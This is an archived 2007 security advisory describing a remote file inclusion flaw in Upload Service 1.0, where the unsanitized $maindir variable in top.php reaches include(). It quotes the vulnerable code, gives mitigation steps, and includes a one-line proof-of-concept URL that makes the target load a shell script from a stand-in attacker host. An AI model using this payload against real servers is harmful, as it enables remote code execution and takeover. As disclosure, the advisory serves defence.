Home / os / win2k

adv62-y3dips-2007.txt

Posted on 24 January 2007

-------------------------------------------------- [ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion -------------------------------------------------- Author : Ahmad Muammar W.K (a.k.a) y3dips Date Found : January, 21st 2007 Location : Indonesia, Jakarta web : http://echo.or.id/adv/adv62-y3dips-2007.txt Critical Lvl : Critical -------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Upload Service version : 1.0 URL : http://bild-bearbeiten.de/ Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip ------------------------------------------- 1. Install directory are not being remove after installation process 2. Variables "$maindir" in top.php are not properly sanitized. ---------------top.php-------- ... include($maindir."config.php"); include($maindir."functions/error.php"); ... ------------------------------ When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Poc/Exploit: ~~~~~~~~~ http://target.com/upload/top.php?maindir=http://attacker.com/shell.php? Solution: ~~~~~~ - Remember to remove your install directory and change config.php permission - Simply Sanitize variable $maindir on affected files. (eg. $maindir=" ";) - Turn off register_globals Notification: ~~~~~~~~~ vendor not contact yet ----------------------------------------------- Shoutz: ~~~~ ~ my lovely ana ~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff ~ newbie_hacker@yahoogroups.com ~ #e-c-h-o @irc.dal.net ---------------------------------------------- Contact: ~~~~~ y3dips|| echo|staff || y3dips[at]gmail[dot]com Homepage: http://y3dips.echo.or.id/ -------- [ EOF ] -------------

 

TOP